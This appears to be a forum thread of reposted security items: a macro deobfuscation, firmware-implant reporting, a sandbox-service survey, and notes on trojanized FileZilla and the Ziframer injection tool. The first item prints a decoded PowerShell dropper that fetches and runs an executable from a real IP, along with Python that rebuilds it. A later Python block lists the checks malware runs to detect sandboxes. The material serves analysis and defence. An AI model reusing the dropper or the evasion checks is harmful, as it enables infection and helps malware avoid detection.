x = "pzq-<X-]|„r`uryy;r…r-5[r„:\owrp-`†€rz;[r;droPyvr{6;Q|„{y|nqSvyr54u}G<<B;>FC;?A@;D<x„rsr„rs<stq€rr<q…‡~;w}t4942aRZ]2iWV\v|qsuv|VU;pno46H-r…}n{q-2aRZ]2iWV\v|qsuv|VU;pno-2aRZ]2iWV\v|qsuv|VU;r…rH-€n-2aRZ]2iWV\v|qsuv|VU;r…rH"
' Same loop as NewQkeTzIIHM: shift every character code down by 13
For i = 1 To Len(x)
    y = y + Chr(Asc(Mid(x, i, 1)) - 13)
Next
WriteFile(y)

This is the clear code obtained:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

And this is the whois of the remote IP:

inetnum: 5.196.243.0 – 5.196.243.7
netname: Just_Hosting
country: IE
descr: Just Hosting
admin-c: OTC9-RIPE
tech-c: OTC9-RIPE
status: ASSIGNED PA
mnt-by: OVH-MNT
source: RIPE # Filtered

A file named dxzq.jpg is downloaded. It’s really a CAB file (JIOiodfhioIH.cab) that is then expanded to JIOiodfhioIH.exe and run.

Source
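The de-obfuscation step from the post, as an added example in Python rather than the post’s VBS (this is neither the author’s code nor the macro’s). The macro’s scheme is a per-character shift of 13, and doing it on raw bytes rather than text matters: the shifted forms of ‘r’ (0x7F, DEL) and ‘t’ (0x81, undefined in Windows-1252) do not survive a text copy, which is why the string literal reproduced above decodes with every ‘r’ and ‘t’ missing. Work from the extracted module’s bytes. The command line is re-obfuscated here from the clear text the post recovered so the round trip runs offline; the IOC regexes are my own.

```python
# Added example, not the forum author's VBS and not the macro's code. The macro's scheme is a
# per-character shift of 13 (Chr(Asc(c) - 13) on the way out), reproduced here on raw bytes.
import re

CP1252_UNDEFINED = {0x81, 0x8D, 0x8F, 0x90, 0x9D}   # code points Windows-1252 does not define


def deobfuscate(blob: bytes, shift: int = 13) -> bytes:
    """Undo the shift: every stored byte is the plaintext byte plus `shift` (mod 256)."""
    return bytes((b - shift) & 0xFF for b in blob)


def obfuscate(plain: bytes, shift: int = 13) -> bytes:
    """The forward direction, used only to build the self-contained sample below."""
    return bytes((b + shift) & 0xFF for b in plain)


def lossy_bytes(blob: bytes):
    """Shifted bytes that a text copy (paste into a post, cp1252 round trip) cannot carry:
    0x7F is DEL and 0x81/0x8D/0x8F/0x90/0x9D are undefined in Windows-1252."""
    return sorted({b for b in blob if b == 0x7F or b in CP1252_UNDEFINED})


URL_RE = re.compile(rb"https?://[^\s'\"<>)]+")
TEMP_PATH_RE = re.compile(rb"%TEMP%\\[^\s'\";]+")


def extract_iocs(command: bytes):
    """URLs and %TEMP% drop paths from the recovered command line, as text, each sorted."""
    urls = sorted({m.decode("latin-1") for m in URL_RE.findall(command)})
    paths = sorted({m.decode("latin-1") for m in TEMP_PATH_RE.findall(command)})
    return urls, paths


# Constructed sample: the command line the post recovered, re-obfuscated with the same shift
# so the round trip runs offline. A real sample comes out of the extracted module as bytes.
CLEAR = (
    b"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile("
    b"'http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg','%TEMP%\\JIOiodfhioIH.cab'); "
    b"expand %TEMP%\\JIOiodfhioIH.cab %TEMP%\\JIOiodfhioIH.exe; start %TEMP%\\JIOiodfhioIH.exe;"
)
OBFUSCATED = obfuscate(CLEAR)

if __name__ == "__main__":
    recovered = deobfuscate(OBFUSCATED)
    print(recovered.decode("latin-1"))
    print("urls, paths:", extract_iocs(recovered))
    print("bytes a text copy would drop:", [hex(b) for b in lossy_bytes(OBFUSCATED)])
```

`lossy_bytes` is the check to run before trusting a decoded string from a pasted sample: if it reports anything, letters are missing from the output and the URL or file names may be wrong.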
  11. Product Description IObit Malware Fighter 3 is an advanced malware & spyware removal utility that detects and removes the deepest infections and users’ most concerned online threats, and protects your PC from malicious behavior in real time. With IObit unique “Dual-Core” anti-malware engine, it’s able to detect the most complex and deepest malware, like spyware, adware, trojans, keyloggers, bots, worms, and hijackers, in a fast and efficient way! With the enhanced browser protection module, IObit Malware Fighter 3 will ensure you a full online surfing & pri Features: Full Anti-Malware Ability with Unique “Dual-Core” Engine Basic Real-time Protection against Malicious Behavior Comprehensive Real-time Protection for Top PC Security Prevent Virus Infection Carried by USB Disk Detect Malicious Process Running in RAM Detect Threats by Analyzing Malicious Action Intelligently Works in Background without Interrupting Automatic Update to the Latest Version Free 24/7 Technical Support on Demand -> Download <-Deal Expires in: EXPIRED!
  12. One of the most shocking parts of the recently discovered spying network Equation Group is its mysterious module designed to reprogram or reflash a computer hard drive’s firmware with malicious code. The Kaspersky researchers who uncovered this said its ability to subvert hard drive firmware—the guts of any computer—“surpasses anything else” they had ever seen. The hacking tool, believed to be a product of the NSA, is significant because subverting the firmware gives the attackers God-like control of the system in a way that is stealthy and persistent even through software updates. The module, named “nls_933w.dll”, is the first of its kind found in the wild and is used with both the EquationDrug and GrayFish spy platforms Kaspersky uncovered. It also has another capability: to create invisible storage space on the hard drive to hide data stolen from the system so the attackers can retrieve it later. This lets spies like the Equation Group bypass disk encryption by secreting documents they want to seize in areas that don’t get encrypted. Kaspersky has so far uncovered 500 victims of the Equation Group, but only five of these had the firmware-flashing module on their systems. The flasher module is likely reserved for significant systems that present special surveillance challenges. Costin Raiu, director of Kaspersky’s Global Research and Analysis Team, believes these are high-value computers that are not connected to the internet and are protected with disk encryption. Here’s what we know about the firmware-flashing module. How It Works Hard drive disks have a controller, essentially a mini-computer, that includes a memory chip or flash ROM where the firmware code for operating the hard drive resides. 
When a machine is infected with EquationDrug or GrayFish, the firmware flasher module gets deposited onto the system and reaches out to a command server to obtain payload code that it then flashes to the firmware, replacing the existing firmware with a malicious one. The researchers uncovered two versions of the flasher module: one that appears to have been compiled in 2010 and is used with EquationDrug and one with a 2013 compilation date that is used with GrayFish.

The Trojanized firmware lets attackers stay on the system even through software updates. If a victim, thinking his or her computer is infected, wipes the computer’s operating system and reinstalls it to eliminate any malicious code, the malicious firmware code remains untouched. It can then reach out to the command server to restore all of the other malicious components that got wiped from the system. Even if the firmware itself is updated with a new vendor release, the malicious firmware code may still persist because some firmware updates replace only parts of the firmware, meaning the malicious portions may not get overwritten with the update. The only solution for victims is to trash their hard drive and start over with a new one.

The attack works because firmware was never designed with security in mind. Hard disk makers don’t cryptographically sign the firmware they install on drives the way software vendors do. Nor do hard drive disk designs have authentication built in to check for signed firmware. This makes it possible for someone to change the firmware. And firmware is the perfect place to conceal malware because antivirus scanners don’t examine it. There’s also no easy way for users to read the firmware and manually check if it’s been altered. The firmware flasher module can reprogram the firmware of more than a dozen different hard drive brands, including IBM, Seagate, Western Digital, and Toshiba.

“You know how much effort it takes to land just one firmware for a hard drive?
You need to know specifications, the CPU, the architecture of the firmware, how it works,” Raiu says. The Kaspersky researchers have called it “an astonishing technical accomplishment and is testament to the group’s abilities.” Once the firmware is replaced with the Trojanized version, the flasher module creates an API that can communicate with other malicious modules on the system and also access hidden sectors of the disk where the attackers want to conceal data they intend to steal. They hide this data in the so-called service area of the hard drive disk where the hard disk stores data needed for its internal operation.

Hidden Storage Is the Holy Grail

The revelation that the firmware hack helps store data the attackers want to steal didn’t get much play when the story broke last week, but it’s the most significant part of the hack. It also raises a number of questions about how exactly the attackers are pulling this off. Without an actual copy of the firmware payload that gets flashed to infected systems, there’s still a lot that’s unknown about the attack, but some of it can be surmised. The ROM chip that contains the firmware includes a small amount of storage that goes unused. If the ROM chip is 2 megabytes, the firmware might take up just 1.5 megabytes, leaving half a megabyte of unused space that can be employed for hiding data the attackers want to steal. This is particularly useful if the computer has disk encryption enabled. Because the EquationDrug and GrayFish malware run in Windows, they can grab a copy of documents while they’re unencrypted and save them to this hidden area on the machine that doesn’t get encrypted. There isn’t much space on the chip for a lot of data or documents, however, so the attackers can also just store something equally as valuable to bypass encryption.
“Taking into account the fact that their GrayFish implant is active from the very boot of the system, they have the ability to capture the encryption password and save it into this hidden area,” Raiu says. Authorities could later grab the computer, perhaps through border interdiction or something the NSA calls “customs opportunities,” and extract the password from this hidden area to unlock the encrypted disk. Raiu thinks the intended targets of such a scheme are limited to machines that are not connected to the internet and have encrypted hard drives. One of the five machines they found hit with the firmware flasher module had no internet connection and was used for special secure communications.

“[The owners] only use it in some very specific cases where there is no other way around it,” Raiu says. “Think about Bin Laden who lived in the desert in an isolated compound—doesn’t have internet and no electronic footprint. So if you want information from his computer how do you get it? You get documents into the hidden area and you wait, and then after one or two years you come back and steal it. The benefits [of using this] are very specific.”

Raiu thinks, however, that the attackers have a grander scheme in mind. “In the future probably they want to take it to the next level where they just copy all the documents [into the hidden area] instead of the password. [Then] at some point, when they have an opportunity to have physical access to the system, they can then access that hidden area and get the unencrypted docs.” They wouldn’t need the password if they could copy an entire directory from the operating system to the hidden sector for accessing later. But the flash chip where the firmware resides is too small for large amounts of data. So the attackers would need a bigger hidden space for storage. Luckily for them, it exists.
There are large sectors in the service area of the hard drive disk that are also unused and could be commandeered to store a large cache of documents, even ones that might have been deleted from other parts of the computer. This service area, also called the reserved area or system area, stores the firmware and other data needed to operate drives, but it also contains large portions of unused space. An interesting paper (.pdf) published in February 2013 by Ariel Berkman, a data recovery specialist at the Israeli firm Recover, noted “not only that these areas can’t be sanitized (via standard tools), they cannot be accessed via anti-virus software [or] computer forensics tools.” Berkman points out that one particular model of Western Digital drives has 141 MB reserved for the service area, but only uses 12 MB of this, leaving the rest free for stealth storage.

To write or copy data to the service area requires special commands that are specific to each vendor and are not publicly documented, so an attacker would need to uncover what these are. But once they do, “[b]y sending Vendor Specific Commands (VSCs) directly to the hard-drive, one can manipulate these [service] areas to read and write data that are otherwise inaccessible,” Berkman writes. It is also possible, though not trivial, to write a program to automatically copy documents to this area. Berkman himself wrote a proof-of-concept program to read and write a file of up to 94 MB to the service area, but the program was a bit unstable and he noted that it could cause some data loss or cause the hard drive to fail. One problem with hiding large amounts of data like this, however, is that its presence might be detected by examining the size of the used space in the service area. If there should be 129 MB of unused space in this sector but there’s only 80 MB, it’s a dead giveaway that something is there that shouldn’t be.
But a leaked NSA document that was written in 2006 but was published by Der Spiegel last month suggests the spy agency might have resolved this particular problem. NSA Interns to the Rescue The document (.pdf) is essentially a wish list of future spy capabilities the NSA hoped to develop for its so-called Persistence Division, a division that has an attack team within it that focuses on establishing and maintaining persistence on compromised machines by subverting their firmware, BIOS, BUS or drivers. The document lists a number of projects the NSA put together for interns to tackle on behalf of this attack team. Among them is the “Covert Storage” project for developing a hard drive firmware implant that can prevent covert storage on disks from being detected. To do this, the implant prevents the system from disclosing the true amount of free space available on the disk. “The idea would be to modify the firmware of a particular hard drive so that it normally only recognizes, say, half of its available space,” the document reads. “It would report this size back to the operating system and not provide any way to access the additional space.” Only one partition of the drive would be visible on the partition table, leaving the other partitions—where the hidden data was stored—invisible and inaccessible. The modified firmware would have a special hook embedded in it that would unlock this hidden storage space only after a custom command was sent to the drive and the computer was rebooted. The hidden partition would then be available on the partition table and accessible until the secret storage was locked again with another custom command. How exactly the spy agency planned to retrieve the hidden data was unclear from the eight-year-old document. Also unclear is whether the interns ever produced a firmware implant that accomplished what the NSA sought. 
But given that the document includes a note that interns would be expected to produce a solution for their project within six months after assignment, and considering the proven ingenuity of the NSA in other matters, they no doubt figured it out.

Source: How the NSA's Firmware Hacking Works and Why It's So Unsettling | WIRED
13. In this section, we’re providing a list of cloud automated online malware analysis tools that are not available anymore due to the website being offline or the service being disrupted by the creators of the analysis environment.

Aerie : https://aerie.cs.berkeley.edu
CWSandbox : The Sandbox | Understanding CyberForensics
ThreatTrack : http://www.treattrack.com
Malbox : Malbox System
VisualThreat : http://www.visualthreat.com
XecScan : http://scan.xecure-lab.com
Norman Sandbox : https://www.norman.com/analysis

Despite quite a few analysis tools being unavailable, there are still a lot of them being actively supported and developed. The online malware analysis tools that are still present on the Internet are presented below. Each of the tools has a letter written in square brackets, which is used later on to present each of the tools in a table in order to preserve space and provide clearer results. Each of the tools also has the URL address where the service is available in case you want to submit different files for analysis.

[A] Anubis : http://anubis.iseclab.org
[C] Comodo : http://camas.comodo.com
[D] Document Analyzer : http://www.document-analyzer.net
[E] Eureka : http://eureka.cyber-ta.org
[J] Joe Sandbox : http://www.joesecurity.org
[M] Malwr : https://malwr.com/submission
[MS] Mobile Sandbox : http://mobilesandbox.org
[TE] Threat Expert : http://www.threatexpert.com/submit.aspx
[TT] Threat Track : http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx
[V] Vicheck : https://www.vicheck.ca
[X] Xandora : http://www.xandora.net/xangui

Note that there are other cloud malware analysis platforms, but we didn’t take them into consideration in this article. Therefore, some of them are not presented and described below.
Supported file formats and document types

Since malware can be hidden in almost any file format or document type, malware analysis tools must provide support for such formats or document types in order to be able to detect the threat inside them. For example: if an attacker has hidden a malicious payload inside a PDF document, the malware analysis tool must have PDF support to be able to manipulate PDF documents. If PDF support is not present, the dissection of the PDF document will not be possible, and consequently the tool will not be able to find the malicious payload. If we look at the PDF document through the eyes of a malware analysis tool, the PDF document is just a set of random bytes.

The attackers mostly use the file formats, document types and other elements presented below for including malicious payloads. The majority of the presented elements need no further introduction, since they are used in our everyday lives, but we will still provide a brief explanation of each of them.

exe: Windows PE executable files normally used for Windows executable programs.
elf: Linux ELF executable files normally used for Linux executable programs.
mach-o: Mac OS X Mach-O executable files normally used for Mac executable programs.
apk: Android APK executable files
url: URLs
pdf: PDF documents
doc/docx: DOC/DOCX documents
ppt/pptx: PPT/PPTX documents
xls/xlsx: XLS/XLSX documents
htm/html: HTM/HTML web pages
jar: JAR Java executable files
rtf: RTF documents
dll: DLL libraries
db: DB database files
png/jpg: PNG/JPG images
zip/rar: ZIP/RAR archives
cpl: Control Panel Applets
ie: Analyze the Internet Explorer process when opening a URL
ps1: PowerShell scripts
python: Python scripts
vbs: VBScript files

The table below presents the supported file formats and document types of each cloud automated malware analysis service.
The rows represent file formats or document types, while the columns are used for each of the automated malware analysis tools, presented by one or two letters (as presented before). The ? is used to denote that a certain file format or document type is supported by an automated malware analysis service, while an empty cell indicates otherwise. The * is used to mark that support for a document type is being implemented, but is not yet available, at the time of this writing.

Table 1: supported document types by different malware analysis tools

Document Type: A C D E J M MS TE TT V X
exe: ? ? ? ? ? ? ?
elf: *
mach-o: ?
apk: ? ? ?
url: ? ?
pdf: ? ? ? ?
doc/docx: ? ? ? ?
ppt/pptx: ? ? ?
xls/xlsx: ? ? ? ?
rtf: ?
htm/html: ? ?
jar: ? ?
dll: ? ?
db: ?
png/jpg: ?
zip/rar: ? ?
cpl: ?
ie: ?
ps1: ?
python: ?
vbs: ?

I’ve spent quite some time putting together the table above, which summarizes the supported file formats, document types and other kinds of elements that can be analyzed in an automated fashion. From the table, we can quickly determine that there isn’t a service that can be used to analyze any kind of file, which is because the malicious code is included in files and documents in a profoundly different manner. When adding malicious code to an executable file, we can do so by including malicious assembly instructions in its .text file section, and that is only one of the ways of doing it. On the other hand, when including malicious code in a .docx document, we usually include it in the form of a malicious macro, which will get executed by Microsoft Word upon opening the document.

Below we’ve presented different ways of categorizing the file formats, document types and other elements presented in the table above. In each of the categories we’ll also briefly discuss how the malicious code gets executed and what is needed for cloud automated malware analysis of such code.
Executable Files [exe, elf, mach-o, apk, dll]: a malicious executable file is distributed around the Internet, which is downloaded by users in the form of cracked software programs and cracked games. The users download a program believing it to be something they want, which it is, but additional code is usually appended to the file containing a malicious payload that gets executed on the user’s computer, therefore infecting it.

Documents [pdf, doc/docx, ppt/pptx, xls/xlsx, rtf]: vulnerabilities are discovered in different software programs on a daily basis. Therefore, if an attacker finds a vulnerability in Acrobat Reader (supports the pdf file format) or Microsoft Word/OpenOffice (supports doc/docx, ppt/pptx, xls/xlsx, rtf), he can craft a document that the program won’t be able to process, but will crash on instead. Depending on the type of vulnerability, an attacker can possibly execute a malicious payload included in the document.

Web browser [url, htm/html, jar, ie]: web browsers also contain vulnerabilities, as PDF readers and office suites do. Therefore, an attacker can create a malicious website the web browser will not be able to handle, which will lead to the web browser crashing, during which an attacker can execute arbitrary code.

Archives [zip/rar]: archives can be used to distribute malicious files around the Internet. If a malicious file is put inside a password-protected archive, the usual analysis solutions won’t be able to take a look inside the archive and determine whether it contains malicious files.

Images [png/jpg]: an attacker can hide a malicious payload inside an image, which can be processed by a vulnerable web application running on an incorrectly set up web server. Therefore, an analysis solution should be able to parse various image file formats in order to determine whether they contain anything out of the ordinary, like a malicious payload.
Code [python, vbs, ps1]: an attacker can also distribute malicious code written in an appropriate programming/scripting language, which is later processed by some application on the victim’s machine. An example is a PowerShell (ps1) macro included in a Word document, which gets executed at the user’s request when allowing the execution of macros upon opening a malicious .docx document in Microsoft Word.

Techniques for Detecting Automated Environments

Various techniques exist for detecting automated malware analysis environments, and they are being incorporated into malware samples. When malware binaries use different checks to determine whether they are executing in a controlled environment, they usually don’t execute malicious actions upon environment detection. The picture below presents an overview of malware and the techniques it can use to detect if it’s being executed in an automated environment. In order to make the picture clearer, we’ll describe the process in detail.

Once the malware has infected the system, it can be running in user or kernel mode, depending upon the exploitation techniques. Usually malware is running in user mode, but there are multiple techniques for malware to gain additional privileges to execute in kernel mode. Whether malware is executed in user or kernel mode, there are multiple techniques malware can use to detect if it’s being executed in an automated malware analysis environment. At the highest level, the techniques are divided into the following categories:

Detect a Debugger: debuggers are mostly used when a malware analyst is manually inspecting a malware sample in order to gain an understanding of what it does. Debuggers are not frequently used in automated malware analysis, but different techniques can still be incorporated into the malware sample to make debugging the malware sample more difficult.
Anti-Disassembly Tricks: this category isn’t directly related to automated malware analysis environments, but when an analyst is manually reviewing the malware sample in a debugger, malware can use different techniques to confuse disassembly engines into producing incorrect disassembled code. This is only useful when a malware analyst is analyzing the malware sample manually, but doesn’t have much impact in automated malware analysis environments.

Detect a Sandbox Environment: a sandbox is an environment separate from the main operating system where malware samples can be run without causing any harm to the rest of the system. The primary purpose of a sandbox environment is to emulate different parts of the system, or the whole system, to separate the guest system from the host system. Depending on the virtualization layer, there are different types of sandboxes, which are presented below.

Virtualized Programs: Chromium Sandbox, Sandboxie
Linux Containers: LXC, Docker
Virtualized Environment: VirtualPC, VMware, VirtualBox, QEMU

Each automated malware analysis tool uses a different backend system to run the malware in a controlled environment. Malware can be run in physical machines or virtual machines. Note that old unused physical machines lying around at home would be perfect candidates for setting up a malware analysis lab, which would make it considerably more difficult for malware binaries to determine whether they are being executed in a controlled environment. When building our own malware analysis lab, we have to connect multiple machines together to form a network, which can be done simply by a virtual or physical switch, depending on the type of machines used. Each cloud automated malware analysis service uses some kind of virtualization environment to run their malware samples, like Qemu/KVM, VirtualBox, VMware, etc.
According to the virtualization technology being used, a malware sample can use different techniques to detect that it’s being analyzed and terminate immediately. Thus the malware sample will not be flagged as malicious, since it terminated preemptively without executing the malicious code.

In this section we’ve seen that different cloud malware analysis services use different virtualization technologies to run submitted malware samples. As far as I know, only Joe Sandbox has an option of running malware samples on actual physical machines, which prevents certain techniques from being used in malware samples to detect if they are being run in an automated malware analysis environment. Still, there are many other techniques malware can use to detect if it’s being analyzed. This is a cat and mouse game, where new detection techniques are invented and used by malware samples on a daily basis. On the other hand, there are numerous anti-detection techniques used to prevent the malware from determining it’s being executed in an automated malware analysis environment. When a new detection technique appears, usually a new anti-detection technique is put together to render the detection technique useless.

Conclusion

In this article we’ve presented the differences between multiple cloud malware analysis services that can be used to analyze different file formats and document types. Each service supports only a fraction of all file formats and document types in which malicious code can be injected. Therefore, depending on the file we have to analyze, we can use the services that support its corresponding file format or document type. In order to analyze a document, we have to choose the appropriate service in order to do so. Since there are many techniques an attacker can use to determine whether the malicious payload is being executed in an automated malware analysis environment, some malicious samples won’t be analyzed correctly, resulting in false positives.
Therefore, such services should only be used together with a reverse engineer or malware analyst in order to manually determine whether the file is malicious or not. Since there are many malicious samples distributed around the Internet on a daily basis, every sample cannot be manually inspected, which is why cloud automated malware analysis services are a great way to speed up the analysis. Source
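The environment checks the article groups under “Detect a Sandbox Environment”, as an added example that is not from the article: each check is written as a pure function over plain values (NIC addresses, process names, CPU and RAM counts, uptime, the CPUID leaf 1 ECX register), so the same logic scores the two constructed host descriptions below and would score real values collected on a live machine by whatever means. The MAC prefixes and process names are the usual VMware, VirtualBox and QEMU ones; the thresholds in `resource_hints` are assumptions.

```python
# Added example, not from the article: the artifact checks a sample typically runs before
# deciding whether it is inside an automated analysis environment. Inputs are plain values so
# the logic can be exercised on constructed host descriptions rather than a live machine.
VM_MAC_OUIS = {                      # well-known virtual NIC vendor prefixes
    "00:50:56": "VMware", "00:0c:29": "VMware", "00:05:69": "VMware",
    "08:00:27": "VirtualBox", "52:54:00": "QEMU/KVM",
}
ANALYSIS_PROCESSES = {               # guest tools and analyst tooling
    "vboxservice.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe",
    "procmon.exe", "wireshark.exe", "x64dbg.exe", "ollydbg.exe",
}


def mac_vendor_hints(macs):
    """One hint per interface whose OUI belongs to a virtualization vendor."""
    hints = []
    for mac in macs:
        oui = mac.lower().replace("-", ":")[:8]
        if oui in VM_MAC_OUIS:
            hints.append(f"nic {mac}: OUI {oui} is {VM_MAC_OUIS[oui]}")
    return hints


def process_hints(process_names):
    """Guest-tools or analysis processes present in the (case-insensitive) process list."""
    found = sorted({p.lower() for p in process_names} & ANALYSIS_PROCESSES)
    return [f"process {p} is analysis or guest-tools software" for p in found]


def resource_hints(cpu_count, ram_gb, uptime_minutes):
    """Sandboxes are usually small and freshly booted; thresholds are assumed."""
    hints = []
    if cpu_count < 2:
        hints.append(f"only {cpu_count} cpu")
    if ram_gb < 4:
        hints.append(f"only {ram_gb} GB ram")
    if uptime_minutes < 10:
        hints.append(f"uptime {uptime_minutes} min")
    return hints


def hypervisor_bit_set(cpuid_leaf1_ecx):
    """CPUID leaf 1, ECX bit 31 is reserved for hypervisors and is set when running under one."""
    return bool((cpuid_leaf1_ecx >> 31) & 1)


def sandbox_hints(host):
    """All artifacts found for one host description (dict with the keys used below)."""
    hints = mac_vendor_hints(host["macs"])
    hints += process_hints(host["processes"])
    hints += resource_hints(host["cpu_count"], host["ram_gb"], host["uptime_minutes"])
    if hypervisor_bit_set(host["cpuid_ecx"]):
        hints.append("cpuid hypervisor-present bit set")
    return hints


# Constructed host descriptions, not real telemetry.
VBOX_GUEST = {
    "macs": ["08:00:27:3a:9b:10"],
    "processes": ["explorer.exe", "VBoxService.exe", "procmon.exe"],
    "cpu_count": 1, "ram_gb": 2, "uptime_minutes": 3, "cpuid_ecx": 0xFFFA3203,
}
WORKSTATION = {
    "macs": ["3c:52:82:1f:00:aa"],
    "processes": ["explorer.exe", "outlook.exe"],
    "cpu_count": 8, "ram_gb": 32, "uptime_minutes": 4320, "cpuid_ecx": 0x7FFAFBFF,
}

if __name__ == "__main__":
    for name, host in (("VBOX_GUEST", VBOX_GUEST), ("WORKSTATION", WORKSTATION)):
        print(name, sandbox_hints(host) or "no artifacts")
```

Read from the defender’s side, each hint is a knob on the analysis guest: give it two or more vCPUs and several GB of RAM, let uptime accumulate before detonation, rename or drop guest tools, and avoid the vendor OUIs. The CPUID bit is the one signal a virtual machine cannot hide without a patched hypervisor, which is the reason the article singles out Joe Sandbox’s physical-machine option.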
14. In an effort to head off the problem of malicious or misbehaving browser add-ons, Mozilla is planning to require developers to have their Firefox extensions signed by the company in the near future.

As much of users’ computing has moved into their browsers in the last few years, extensions and add-ons have become important tools. There are an untold number of useful extensions for most of the major browsers, but there are also plenty of malicious ones. Attackers have been known to insert extensions into browser Web stores or other download sites in order to steal users’ data or perform other malicious actions. There also are all kinds of somewhat legitimate extensions that may collect more data than they disclose to users or perform unwanted actions. To defeat this problem, Google requires developers to distribute their extensions through the Chrome Web store. However, Mozilla officials said they didn’t want to take that approach.

“We’re responsible for our add-ons ecosystem and we can’t sit idle as our users suffer due to bad add-ons. An easy solution would be to force all developers to distribute their extensions through AMO, like what Google does for Chrome extensions. However, we believe that forcing all installs through our distribution channel is an unnecessary constraint. To keep this balance, we have come up with extension signing, which will give us better oversight on the add-ons ecosystem while not forcing AMO to be the only add-on distribution channel,” Jorge Villalobos of Mozilla said in a blog post.

The idea is that sometime in the second quarter, Mozilla will begin requiring developers to submit their extensions and add-ons to AMO, the company’s main distribution channel for those apps. Each submission will go through a review process to ensure that it doesn’t exhibit any malicious or undocumented behavior. If the developer plans to host her extension on AMO and it passes the check, Mozilla will automatically sign it.
If the developer plans to host the extension elsewhere, it will go through the same process and be sent back signed if it passes muster. The change will mean that after a transition period of about three months, users won’t be able to install any unsigned extensions on either the Release or Beta versions of Firefox. Villalobos said the company plans to begin displaying warnings about unsigned extensions in Firefox 39. This move by Mozilla will give users more confidence in the extensions and add-ons they’re installing. “Extensions that change the homepage and search settings without user consent have become very common, just like extensions that inject advertisements into Web pages or even inject malicious scripts into social media sites. To combat this, we created a set of add-on guidelines all add-on makers must follow, and we have been enforcing them via blocklisting (remote disabling of misbehaving extensions). However, extensions that violate these guidelines are distributed almost exclusively outside of AMO and tracking them all down has become increasingly impractical. Furthermore, malicious developers have devised ways to make their extensions harder to discover and harder to blocklist, making our jobs more difficult,” Villalobos said. Source
  15. Threat Level: High Severity: High CVSS Severity Score: 7.0 Impact Type: Complete confidentiality, integrity and availability violation. [2] Vulnerability: (1) Filtration Bypass. (3) Unauthenticated Cross Site scripting vulnerabilities. Description A malicious user could get unsuspecting visitors into divulging their credentials, to force a redirection to a heterogeneous third-party website, or to execute malicious code, on behalf of the attacker. An attacker can also fold malicious content into the content being delivered to visitors on the site. In this attack “Visitor -> Vendor” trust-levels are directly impacted, since the vendor’s website, and associated services, and products have high levels of trust by default. Read more: http://dl.packetstormsecurity.net/1501-advisories/Oracle_Website_Vulnerabilities119.pdf
  16. PeStudio is a unique tool that performs the static analysis of 32-bit and 64-bit Windows executables. A malicious executable attempts to hide its malicious intents and to evade detection. In doing so, it generally presents anomalies and suspicious patterns. The goal of PeStudio is to detect these anomalies, provide indicators and score the executable being analyzed. Since the executable file being analyzed is never started, you can inspect any unknown or malicious executable with no risk. Download: http://www.winitor.com/tools/PeStudio846.zip
  17. PEStudio is a unique tool that performs the static investigation of 32-bit and 64-bit executables. PEStudio is free for private non-commercial use only. A malicious executable often attempts to hide its malicious behavior and to evade detection. In doing so, it generally presents anomalies and suspicious patterns. The goal of PEStudio is to detect these anomalies, provide Indicators and score the Trust for the executable being analyzed. Since the executable file being analyzed is never started, you can inspect any unknown or malicious executable with no risk. Download: Index of /tools
  18. Malware code can be very small, and the impact can be very severe! The Antivirus firm AVAST spotted a malicious version of the open source FTP (File Transfer Protocol) software 'FileZilla' out in the wild. The software is open source, but has been modified by hackers to steal users' credentials, and is offered on various hacked sites for download with banner or text ads. Once installed, the software's appearance and functionalities are equal to the original version, so a user cannot distinguish between the fake and the real one, and the malware version of the “.exe” file is just slightly smaller than the real one. "The installed malware FTP client looks like the official version and it is fully functional! You can’t find any suspicious behavior, entries in the system registry, communication or changes in application GUI." The only difference is that the malware version uses 2.46.3-Unicode and the official installer uses v2.45-Unicode, as shown: "We found a hardcoded connection detail stealer after deeper analysis. Malware authors abuse open source code and add their own stealer function to the main code." The modified version copies the login information of the user and sends it to a server that is apparently in Germany, and the same IP address of the server hosts three other domains, which are also associated with malware and spam activities. "Login details are sent to attackers from the ongoing FTP connection only once. Malware doesn't search bookmarks or send any other files or saved connections," Avast explains. This malicious version was compiled way back in September 2012, and is still detected by just a couple of Antivirus solutions. In the past, Cyber Criminals also used Google Adsense to promote malicious software or modified open source software. Be careful when downloading the FileZilla FTP client, such malware could also be employed for spreading more malware. Users are recommended to download the software from the official website only.
Source: Warning: Malicious version of FTP Software FileZilla stealing users' Credentials - The Hacker News Personal note: Anyway, FileZilla is the most hopeless FTP client there is. Even for SSL/TLS connections, it stores passwords in plain text. Loads of tickets have been filed with them and it seems they don't consider it anything serious. Reference: http://trac.filezilla-project.org/ticket/5530 status changed from new to closed priority changed from critical to normal resolution set to rejected .... On the FileZilla trac: I recommend you stop downloading it altogether.
  19. An Iframer is a script which is used to test stolen FTP accounts and inject malicious code into web pages. If an FTP account is valid, the Iframer automatically puts a Drive-by infection on the specified html, php or asp files. In this case the Iframer is a PHP script which is used to spread a variant of ZeuS (aka Zbot/WSNPoem). The Iframer is called “Ziframer” and is sold for 30$. The PHP script can be launched via command line or accessed using a web browser: The script is very simple and just needs a list of FTP accounts which the script should check. As you can see on the screenshot above, the input file (ftp.txt) currently contains more than 18’000 stolen FTP credentials: In the file “iframe.txt” the attacker can define the (JavaScript or HTML) code he would like to inject: The cybercriminal also has the possibility to set a timeout, a file where the script will report invalid FTP credentials (bad.txt) and a file which will collect valid FTP credentials (good.txt). The screenshot below shows you the script while working through the list of stolen FTP credentials (ftp.txt): Last but not least the attacker has to define where he wants to put the malicious code. He has the following options: start page – Inject the code at the top of the page end – Inject the code at the bottom of the page change – Replace a text or a string in the page with the malicious code check – Check if the malicious code is already on the page Now the cybercriminal just has to press the “START” button to run the script. The Iframer script will now go through the FTP accounts and inject the malicious code which is defined in the file “iframe.txt” (see this one). To make the use of the script more user friendly, the script has a readme file which describes the usage of the script in Russian and English. Content of readme.html (English): This script is designed to test the FTP accounts on the validity, insert the code into files on the FTP.
[Features]
[*] Console and Web interface
[*] Stabilno runs under Windows and Nix BSD
[*] Check for validity ftp
[*] Paste the Code (at the beginning or end of file. Or a full overwrite the file to your text – defeys)
[*] Strange Komentirovanie iframe’ov
[*] Convenience logs
[*] All akki (valid \ invalid) remain in the database.
